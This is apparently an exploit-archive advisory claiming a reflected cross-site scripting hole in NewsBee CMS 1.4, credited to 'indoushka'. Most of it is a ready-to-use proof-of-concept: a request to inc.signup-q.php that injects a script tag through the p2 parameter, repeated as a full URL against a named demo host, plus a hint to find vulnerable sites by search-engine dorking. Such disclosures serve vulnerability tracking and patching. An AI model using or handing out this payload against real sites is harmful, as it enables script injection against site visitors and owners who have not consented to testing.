NewsBee CMS version 1.4 suffers from a cross site scripting vulnerability.
878a59b2ec6c61dc09d8a43c81b5fd0a
====================================================================================================================================
| # Title : NewsBee CMS 1.4 xss Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Vendor : https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 |
| # Dork : N/A |
====================================================================================================================================
poc :
[+] Dorking Adegn Google Or Other Search Enggine .
[+] use payload : inc.signup-q.php?p1=e&p10=undefined&p11=undefined&p12=undefined&p13=undefined&p14=undefined&p15=undefined&p16=undefined&p17=undefined&p18=undefined&p19=undefined&p2=sample%40email.tst%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/cxsecurity/)%3C/ScRiPt%3E&p20=undefined&p21=undefined&p22=undefined&p23=undefined&p24=undefined&p25=undefined&p26=undefined&p3=undefined&p4=undefined&p5=undefined&p6=undefined&p7=undefined&p8=undefined&p9=undefined&view=
http://codecanyon.nelliwinne.net/NewsBee/inc.signup-q.php?p1=e&p10=undefined&p11=undefined&p12=undefined&p13=undefined&p14=undefined&p15=undefined&p16=undefined&p17=undefined&p18=undefined&p19=undefined&p2=sample%40email.tst%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/cxsecurity/)%3C/ScRiPt%3E&p20=undefined&p21=undefined&p22=undefined&p23=undefined&p24=undefined&p25=undefined&p26=undefined&p3=undefined&p4=undefined&p5=undefined&p6=undefined&p7=undefined&p8=undefined&p9=undefined&view=
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================